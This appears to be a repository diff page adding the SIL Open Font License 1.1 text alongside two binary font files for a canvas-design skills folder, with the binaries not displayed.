This Font Software is licensed under the SIL Open Font License, Version 1.1.
|
||||||
|
This license is copied below, and is also available with a FAQ at:
|
||||||
|
https://openfontlicense.org
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------------------------------------
|
||||||
|
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
|
||||||
|
-----------------------------------------------------------
|
||||||
|
|
||||||
|
PREAMBLE
|
||||||
|
The goals of the Open Font License (OFL) are to stimulate worldwide
|
||||||
|
development of collaborative font projects, to support the font creation
|
||||||
|
efforts of academic and linguistic communities, and to provide a free and
|
||||||
|
open framework in which fonts may be shared and improved in partnership
|
||||||
|
with others.
|
||||||
|
|
||||||
|
The OFL allows the licensed fonts to be used, studied, modified and
|
||||||
|
redistributed freely as long as they are not sold by themselves. The
|
||||||
|
fonts, including any derivative works, can be bundled, embedded,
|
||||||
|
redistributed and/or sold with any software provided that any reserved
|
||||||
|
names are not used by derivative works. The fonts and derivatives,
|
||||||
|
however, cannot be released under any other type of license. The
|
||||||
|
requirement for fonts to remain under this license does not apply
|
||||||
|
to any document created using the fonts or their derivatives.
|
||||||
|
|
||||||
|
DEFINITIONS
|
||||||
|
"Font Software" refers to the set of files released by the Copyright
|
||||||
|
Holder(s) under this license and clearly marked as such. This may
|
||||||
|
include source files, build scripts and documentation.
|
||||||
|
|
||||||
|
"Reserved Font Name" refers to any names specified as such after the
|
||||||
|
copyright statement(s).
|
||||||
|
|
||||||
|
"Original Version" refers to the collection of Font Software components as
|
||||||
|
distributed by the Copyright Holder(s).
|
||||||
|
|
||||||
|
"Modified Version" refers to any derivative made by adding to, deleting,
|
||||||
|
or substituting -- in part or in whole -- any of the components of the
|
||||||
|
Original Version, by changing formats or by porting the Font Software to a
|
||||||
|
new environment.
|
||||||
|
|
||||||
|
"Author" refers to any designer, engineer, programmer, technical
|
||||||
|
writer or other person who contributed to the Font Software.
|
||||||
|
|
||||||
|
PERMISSION & CONDITIONS
|
||||||
|
Permission is hereby granted, free of charge, to any person obtaining
|
||||||
|
a copy of the Font Software, to use, study, copy, merge, embed, modify,
|
||||||
|
redistribute, and sell modified and unmodified copies of the Font
|
||||||
|
Software, subject to the following conditions:
|
||||||
|
|
||||||
|
1) Neither the Font Software nor any of its individual components,
|
||||||
|
in Original or Modified Versions, may be sold by itself.
|
||||||
|
|
||||||
|
2) Original or Modified Versions of the Font Software may be bundled,
|
||||||
|
redistributed and/or sold with any software, provided that each copy
|
||||||
|
contains the above copyright notice and this license. These can be
|
||||||
|
included either as stand-alone text files, human-readable headers or
|
||||||
|
in the appropriate machine-readable metadata fields within text or
|
||||||
|
binary files as long as those fields can be easily viewed by the user.
|
||||||
|
|
||||||
|
3) No Modified Version of the Font Software may use the Reserved Font
|
||||||
|
Name(s) unless explicit written permission is granted by the corresponding
|
||||||
|
Copyright Holder. This restriction only applies to the primary font name as
|
||||||
|
presented to the users.
|
||||||
|
|
||||||
|
4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
|
||||||
|
Software shall not be used to promote, endorse or advertise any
|
||||||
|
Modified Version, except to acknowledge the contribution(s) of the
|
||||||
|
Copyright Holder(s) and the Author(s) or with their explicit written
|
||||||
|
permission.
|
||||||
|
|
||||||
|
5) The Font Software, modified or unmodified, in part or in whole,
|
||||||
|
must be distributed entirely under this license, and must not be
|
||||||
|
distributed under any other license. The requirement for fonts to
|
||||||
|
remain under this license does not apply to any document created
|
||||||
|
using the Font Software.
|
||||||
|
|
||||||
|
TERMINATION
|
||||||
|
This license becomes null and void if any of the above conditions are
|
||||||
|
not met.
|
||||||
|
|
||||||
|
DISCLAIMER
|
||||||
|
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||||
|
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
|
||||||
|
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
|
||||||
|
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
|
||||||
|
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
|
||||||
|
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
|
||||||
|
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
||||||
|
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
|
||||||
|
OTHER DEALINGS IN THE FONT SOFTWARE.
|
||||||
BIN
skills/canvas-design/canvas-fonts/Outfit-Regular.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/Outfit-Regular.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/PixelifySans-Medium.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/PixelifySans-Medium.ttf
Normal file
Binary file not shown.
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user